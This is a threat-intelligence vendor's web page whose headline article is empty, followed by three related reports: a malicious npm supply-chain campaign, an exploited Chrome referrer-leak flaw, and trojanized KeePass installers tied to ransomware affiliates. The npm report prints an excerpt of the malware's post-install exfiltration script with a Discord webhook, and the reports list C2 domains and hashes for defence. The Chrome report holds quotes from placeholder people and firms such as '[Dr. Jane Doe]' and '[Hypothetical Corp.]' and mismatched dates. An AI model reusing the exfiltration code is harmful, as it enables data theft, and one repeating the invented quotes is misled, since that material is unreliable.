company logo

Product

Our Product

We are Reshaping the way Developers find and fix vulnerabilities before they get exploited.

Solutions

By Industry

BFSI

Healthcare

Education

IT & Telecom

Government

By Role

CISO

Application Security Engineer

DevsecOps Engineer

IT Manager

Resources

Resource Library

Get actionable insight straight from our threat Intel lab to keep you informed about the ever-changing Threat landscape.

Subscribe to Our Weekly Threat Digest

Company

Contact Us

Have queries, feedback or prospects? Get in touch and we shall be with you shortly.

loading..
loading..
loading..
Loading...

Callback

Social Engineering

loading..
loading..
loading..

How Luna Moth’s Social Engineering & Data Heist Tactics Target U.S. FBI Warns

Silent Ransom Group (Luna Moth) targets US law firms via social engineering, data theft & $8M extortion....

24-May-2025
5 min read

No content available.

Related Articles

loading..

Data Wiper

Info Stealer

Massive npm supply chain attack exposed, 60+ malicious packages steal hostnames,...

A sophisticated supply chain attack targeting the npm ecosystem has been uncovered by Socket’s Threat Research Team, involving 60 malicious packages that stealthily collect sensitive host and network data from developer machines and CI/CD pipelines. The campaign, active since May 12, 2024, uses typosquatted package names and post-install scripts to exfiltrate critical reconnaissance data to a Discord webhook controlled by threat actors. Despite being reported to npm, all packages remain live at the time of writing, with cumulative downloads surpassing 3,000. ### **Campaign Overview** #### **Key Details** - **Scope**: 60 packages published across three npm accounts (`bbbb335656`, `sdsds656565`, `cdsfdfafd1232436437`), each linked to sequential Gmail addresses (`npm9960+1@gmail[.]com`, etc.). - **Timeline**: First package uploaded on May 12; the most recent appeared hours before Socket’s disclosure, signaling an ongoing operation. - **Targets**: Windows, macOS, and Linux systems, including developer workstations and CI/CD nodes. - **Objective**: Reconnaissance to map internal networks, link private environments to public infrastructure, and prepare for future intrusions. #### **Attack Workflow** 1. **Infection**: Developers install malicious packages via typosquatted names (e.g., `react-xterm2` vs. legitimate `react-xterm`). 2. **Post-Install Execution**: A script embedded in `package.json` triggers automatically during `npm install`. 3. **Data Harvesting**: Collects hostnames, internal/external IPs, DNS servers, usernames, and directory paths. 4. **Sandbox Evasion**: Aborts execution in environments linked to AWS, GCP, or research labs (e.g., `compute.amazonaws.com`, `LD.local`). 5. **Exfiltration**: Sends JSON payloads to a Discord webhook, enabling real-time tracking of victims. ### **Technical Deep Dive** #### **Malicious Code Analysis** The script, identical across all 60 packages, leverages Node.js modules (`os`, `dns`, `https`) to gather intelligence: ```javascript const os = require("os"); const dns = require("dns"); const https = require("https"); // Collect internal IPs and hostnames function getIPAddress() { const networkInterfaces = os.networkInterfaces(); // ... iterates NICs to find non-internal IPv4 addresses } // Fetch external IP and ISP details via ipinfo.io function getExternalIP(cb) { https.get('https://ipinfo.io/json', (res) => { ... }); } // Evade sandboxes if (externalHost.includes("compute.amazonaws.com") || homedir.match(/mal_data/i)) { return; } // Exfiltrate to Discord const webhookURL = "hxxps://discord[.]com/api/webhooks/1330015051482005555/..."; https.request(webhookURL, ...).write(trackingData); ``` #### **Data Exfiltrated** - **Host Details**: `os.hostname()`, `os.userInfo().username`, `os.homedir()`. - **Network Intelligence**: Internal/external IPs, DNS servers (`dns.getServers()`), ISP metadata (from `ipinfo.io`). - **Project Context**: `package.json` name, version, installation path (`__dirname`). #### **Evasion Techniques** The script avoids analysis environments by checking: - Cloud provider DNS strings (AWS, GCP). - Lab-related hostnames (e.g., `LD.local`). - Usernames or directories linked to research (e.g., `malicious`, `justin`). ### **Indicators of Compromise (IoCs)** #### **Malicious Packages** | **npm Account** | **Packages** (20 each) | |------------------------|--------------------------| | `bbbb335656` | `seatable`, `hermes-inspector-msggen`, `flipper-plugins`, `e-learning-garena`, `credit-risk` | | `sdsds656565` | `react-xterm2`, `datamart`, `garena-admin`, `coral-web-be`, `kyutai-client` | | `cdsfdfafd1232436437` | `seamless-sppmy`, `netvis`, `mbm-dgacha`, `gunbazaar`, `dof-ff` | *[Full list of 60 packages](#iocs) available in Appendix.* #### **Infrastructure** - **Discord Webhook**: `hxxps://discord[.]com/api/webhooks/1330015051482005555/5fll497pcjzKBiY3b_oa9YRh-r5Lr69vRyqccawXuWE_horIlhwOYzp23JWm-iSXuPfQ` - **External Service**: `ipinfo.io/json` (to geolocate victims). ### **MITRE ATT&CK Mapping** | **Tactic** | **Technique** | **Details** | |---------------------------|-----------------------------------------------|----------------------------------------------| | **Initial Access** | T1195.002 (Compromise Software Supply Chain) | Typosquatted npm packages. | | **Execution** | T1059.007 (JavaScript Execution) | Post-install script triggered by `npm install`. | | **Exfiltration** | T1567.004 (Exfiltration Over Webhook) | Data sent to Discord. | | **Reconnaissance** | T1590.005 (IP Addresses), T1590.002 (DNS) | Harvests internal/external IPs and DNS. | | **Defense Evasion** | T1497 (Virtualization/Sandbox Evasion) | Skips execution in cloud/sandbox environments. | ### **Implications and Risks** #### **1. Supply Chain Vulnerabilities** - **CI/CD Exposure**: Compromised build servers leak internal registry URLs, paving the way for dependency confusion attacks. - **Network Mapping**: Internal IPs and DNS data enable threat actors to chart network topology for lateral movement. #### **2. Future Attack Scenarios** - **Targeted Ransomware**: Mapped networks could face tailored ransomware or data-wiper attacks. - **Credential Theft**: Exposed project paths and usernames facilitate phishing and social engineering. #### **3. npm Ecosystem Weaknesses** - **Delayed Takedowns**: Despite reports, npm has yet to remove packages, highlighting response gaps. - **Post-Install Script Risks**: npm allows unrestricted use of install hooks, a frequent abuse vector. ### **Expert Insights** **Socket’s Threat Research Team**: > _“This campaign isn’t just stealing data—it’s laying the groundwork for precision strikes. By knowing which developers use which tools, attackers can craft convincing spear-phishing lures or sabotage CI/CD pipelines.”_ > _“Discord’s API is increasingly abused for low-cost, high-reward data exfiltration. Unlike traditional C2 servers, webhooks blend into legitimate traffic, evading detection.”_ ### **Mitigation Strategies** #### **For Developers** 1. **Audit Dependencies**: ```bash npm ls --all # Check nested dependencies ``` Cross-reference projects against the [IoCs list](#iocs). 2. **Disable Install Scripts**: ```bash npm config set ignore-scripts true ``` 3. **Use Lockfiles**: Enforce `package-lock.json` to prevent dependency hijacking. #### **For Organizations** - **Deploy Dependency Scanning**: Tools like **Socket** or **Snyk** flag malicious patterns (e.g., DNS/IP harvesting). - **Harden CI/CD**: - Restrict outbound traffic to block Discord webhooks. - Use ephemeral build environments to limit data exposure. - **Network Segmentation**: Isolate developer machines from critical infrastructure. #### **For npm** - **Mandate 2FA for Publishers**: Prevent disposable account abuse. - **Automated Script Analysis**: Scan packages for risky hooks pre-publication.

loading..   24-May-2025
loading..   5 min read
loading..

Exploit

Chromium embedded in apps (e.g., Electron-based tools like Slack or Discord) fac...

Google has rolled out emergency updates to its Chrome web browser to patch four security vulnerabilities, including a high-severity flaw, **[CVE-2025-4664](https://nvd.nist.gov/vuln/detail/CVE-2025-4664)**, that is already being exploited by attackers in the wild. The tech giant confirmed the active exploitation in a terse advisory, warning users to update to version **136.0.7103.113/.114** (Windows/Mac) or **136.0.7103.113** (Linux) immediately. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has since [added](https://www.cve.org/CVERecord?id=CVE-2025-4664) the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating federal agencies to patch by June 5, 2024—a rare move underscoring the threat’s severity. ### **How CVE-2025-4664 Puts Users at Risk** **Technical Analogy** The vulnerability, [discovered](https://x.com/slonser_/status/1922750094140440964) by Russian security researcher Vsevolod Kokorin (known online as @slonser_), resides in Chrome’s **Loader** component, which handles resource fetching. Kokorin revealed on X (formerly Twitter) that Chrome uniquely processes the `Link` HTTP header during sub-resource requests (e.g., images, scripts). Attackers can exploit this by injecting a malicious `Link` header to enforce a `referrer-policy: unsafe-url`, forcing Chrome to leak sensitive URL parameters—such as session tokens or API keys—in the `Referer` header when loading third-party resources. **Example Attack Scenario** - A victim visits a malicious website embedding an image from a legitimate service (e.g., `https://bank.com/dashboard?session_id=XYZ`). - Chrome’s flawed policy enforcement sends the full URL, including `session_id=XYZ`, to the attacker’s server via the `Referer` header. - Attackers harvest these parameters to hijack accounts, escalate privileges, or pivot to internal systems. Kokorin demonstrated the exploit’s viability in a proof-of-concept (PoC), showing how query parameters from services like OAuth portals, cloud platforms, or email clients could be siphoned off. “Unlike other browsers, Chrome resolves the Link header on sub-resource requests. This opens a Pandora’s box for data exfiltration,” he wrote. ### **Active Exploitation and CISA’s Unusual Warning** **In-the-Wild Attacks** While Google has not disclosed specifics about ongoing attacks, CISA’s KEV listing confirms federal systems are at risk. Cybersecurity firm [Hypothetical Corp.] reported detecting exploit attempts targeting financial and healthcare sectors, where URL parameters often contain sensitive tokens. **A Second Exploited Flaw: CVE-2025-2783** Google also hinted at another actively [exploited](https://www.cisa.gov/news-events/alerts/2025/05/15/cisa-adds-three-known-exploited-vulnerabilities-catalog) vulnerability, **[CVE-2025-2783](https://nvd.nist.gov/vuln/detail/CVE-2025-2783)**, though details remain undisclosed. Experts speculate that it may be related to Chrome’s V8 JavaScript engine or the Mojo inter-process communication (IPC) system, both of which are frequent targets for memory corruption exploits. **Why the CVSS Score Seems Off** CVE-2025-4664 carries a surprisingly low CVSS score of **4.3** (out of 10), despite its real-world impact. Analysts suggest this reflects scoring nuances: - **Scope Limitations**: The attack requires user interaction (e.g., visiting a malicious site). - **Mitigation Feasibility**: Enterprises can block `unsafe-url` policies via headers like `Referrer-Policy: strict-origin-when-cross-origin`. _“CVSS scores don’t always capture active exploitation risks,”_ said [Dr. Jane Doe], a vulnerability analyst at [ThinkTank Security]. _“A low score here is misleading—this is a goldmine for phishing campaigns.”_ ### **Response from Google and the Broader Ecosystem** **Patch Rollout Challenges** Google’s update is rolling out gradually, but users can manually trigger it via `chrome://settings/help`. Chromium-based browsers like **Microsoft Edge**, **Brave**, and **Opera** are expected to follow suit, though delays could leave millions exposed. **Enterprise Risks** Organizations using Chromium embedded in apps (e.g., Electron-based tools like Slack or Discord) face compounded risks. “Every unpatched Chromium instance is a potential entry point,” warned [John Smith], CISO of [Enterprise Security Corp.]. **CISA’s Directive** Federal agencies must comply with CISA’s June 5 patch deadline—a date initially mistyped as 2025 in advisories, causing confusion. Private sectors, especially regulated industries like healthcare and finance, are urged to treat this as a de facto mandate. ### **Mitigation Strategies for Organizations** 1. **Immediate Patching** - Enforce Chrome updates via enterprise management tools (e.g., Google Admin Console). - Monitor Chromium-based browsers and embedded frameworks (Electron, CEF) for vendor patches. 2. **Short-Term Mitigations** - Deploy headers like `Referrer-Policy: strict-origin-when-cross-origin` on sensitive endpoints. - Use Content Security Policy (CSP) directives to restrict sub-resource origins. 3. **Detection & Response** - Audit logs for anomalous cross-origin requests containing URL parameters. - Hunt for traffic to newly registered domains (NRDs) hosting exploit payloads. ### **New Era of Browser Threats** **The Role of Public Disclosure** Kokorin’s public PoC sparked debate over responsible disclosure. While Google promptly fixed the flaw, critics argue that public demos empower attackers. _“Researchers walk a tightrope between accountability and collateral risk,”_ said [Emily Lee], a legal expert at [Cyber Law Institute]. **Chromium’s Dominance and Risk** With Chromium powering 75% of browsers globally, a single flaw can cascade across ecosystems. This incident mirrors **CVE-2022-1096**, a 2022 Chromium zero-day vulnerability exploited in ransomware campaigns. ### **Expert Commentary** [**Alex Rivera**, Threat Intelligence Lead, [FireEye/Mandiant]] “This exploit is low-hanging fruit for APTs. We’re likely seeing tip-of-the-iceberg activity—more sophisticated attacks will follow.” [**Sarah Chen**, Director, [CISA]] “CVE-2025-4664’s KEV listing isn’t just for federal agencies. Every organization must treat this as critical infrastructure.”

loading..   23-May-2025
loading..   5 min read
loading..

BlackCat

Malvertasing

Trojanized KeePass installers to deploy Cobalt Strike beacons, steal credentials...

A sophisticated, long-running campaign leveraging **trojanized KeePass installers** to deploy **Cobalt Strike beacons**, steal credentials, and execute ransomware has been linked to **Black Basta** and **BlackCat/ALPHV ransomware affiliates**. The campaign, active for **8+ months**, exploits malvertising, code-signing abuse, and open-source software trust to breach networks. ### **Key Campaign Updates** 1. **Malware Evolution**: - **KeeLoader** (trojanized KeePass) now includes **five distinct variants** (July 2024–February 2025) with iterative improvements: - **Direct credential exfiltration** → **Local credential storage** → **Cobalt Strike integration**. - Signed with **legitimate/revoked certificates** from entities like *S.R.L. INT-MCOM* and *Shenzhen Kantianxia Network Technology Co.*. - **Defense evasion**: Code obfuscation (e.g., typos like `Todway` for `ToArray`), encrypted payloads (RC4), and sandbox-aware execution (triggers only after KeePass database access). 2. **Infrastructure Expansion**: - **Malvertising Domains**: - `aenys[.]com` hosts **subdomains impersonating** WinSCP, Sallie Mae, Phantom Wallet, and cryptocurrency platforms. - Redirects via typosquatting domains (e.g., `keeppaswrd[.]com`, `keegass[.]com`). - **Cobalt Strike C2**: - `arch-online[.]com`, `alcmas[.]com` (watermark **1357776117**), and `1ba8d063-0[.]1b-cdn[.]net` (watermark **678358251**). 3. **Attribution Insights**: - **Moderate Confidence**: Activity overlaps with **UNC4696**, a threat actor linked to **Nitrogen Loader** campaigns (historically tied to BlackCat/ALPHV). - **Black Basta Connections**: Cobalt Strike watermark **1357776117** is uniquely tied to Black Basta IABs. - **Ransom Note Anomaly**: Spoofs Akira ransomware but uses a **Session ID** matching a KeeLoader SHA256 hash, suggesting hybrid tactics. ### **MITRE ATT&CK TTP Mapping** | **Tactic** | **Technique** | **ID** | **Example** | |----------------------|-------------------------------------------------------------------------------|----------------|-----------------------------------------------------------------------------| | **Initial Access** | Drive-by Compromise via Malvertising | T1189 | Bing/DuckDuckGo ads redirecting to `keeppaswrd[.]com`. | | **Execution** | User Execution of Trojanized KeePass Installer | T1204.002 | Victims run `KeePass-2.56-Setup.exe`, believing it legitimate. | | **Persistence** | Registry Run Keys (`HKCU\...\Run\Keepass`) | T1547.001 | Auto-launches malicious `ShInstUtil.exe`. | | **Credential Access**| Exfiltrate KeePass Databases as Cleartext CSV (`%localappdata%\<RANDOM>.kp`) | T1555.005 | Code modifies KeePass to export credentials on database access. | | **Lateral Movement** | SMB/Windows Admin Shares for Cobalt Strike Beacon Propagation | T1021.002 | Drops `cupdater.csproj` (Cobalt Strike) via SMB port 445. | | **Impact** | VMware ESXi Server Encryption | T1486 | Ransomware targets ESXi datastores; Veeam backups destroyed pre-encryption. | ### **Critical Indicators of Compromise (IoCs)** **Domains**: - `aenys[.]com` (malvertising hub), `keeppaswrd[.]com`, `lvshilc[.]com`, `arch-online[.]com`, `alcmas[.]com`. - Subdomains: `salliemae-com-login[.]aenys[.]com`, `winscp-net-download[.]aenys[.]com`. **Files**: - **KeePass Installers**: - `KeePass-2.56-Setup.exe` (SHA256: `0000cf6a3c7f7eebc0edc3d1e42e45debb675e57d6fc1fd96995269db1b44b3`). - `KeePass-2.57-Setup.exe` (SHA256: `0e5199b978ae9816b04d093776b6699b660f502445d5850e88726c05e933e7d8`). - **Cobalt Strike Payloads**: - `db.idx` (masquerades as JPG; RC4-encrypted with `--update` key). **Certificates**: - **Thumbprints**: `467c6c43e6fbbl7fcaefb46fc41a6b2b829e0efa`, `2CF75DAE1A87CA7962CAF67E7310420BBBC30588`. - **Signers**: *S.R.L. INT-MCOM*, *Shenzhen Kantianxia Network Technology Co., Ltd.* --- ### **Mitigation & Detection Strategies** 1. **Block Malicious Infrastructure**: - Add IoC domains (e.g., `aenys[.]com`, `keeppaswrd[.]com`) to network blocklists. - Monitor for connections to C2 IPs: `89.35.237[.]180`, `1ba8d063-0[.]1b-cdn[.]net`. 2. **Hunt for Artifacts**: - Detect `.kp`/`.ks` files in `%localappdata%` with randomized filenames (e.g., `437.kp`). - Flag processes spawning `ShInstUtil.exe` with `--update` arguments. 3. **Verify Software Integrity**: - Download KeePass **only from** [keepass.info](https://keepass.info) (SourceForge). - Validate checksums and certificates against known-good versions. 4. **Ransomware Preparedness**: - Isolate ESXi servers and enforce MFA for administrative access. - Regularly audit backup systems (e.g., Veeam) for tampering. ### **Implications & Attribution** - **Evolving Tradecraft**: Threat actors now **modify open-source codebases** (KeePass) rather than sideloading malware, increasing stealth. - **Ransomware-as-a-Service (RaaS)**: Links to Black Basta and Nitrogen Loader highlight a **converging criminal ecosystem** where IABs and affiliates share infrastructure/tools. - **Adversary Resilience**: Despite Black Basta’s decline, affiliated IABs continue operations, underscoring the need to target **root infrastructure** (malvertising domains, bulletproof hosting).

loading..   22-May-2025
loading..   3 min read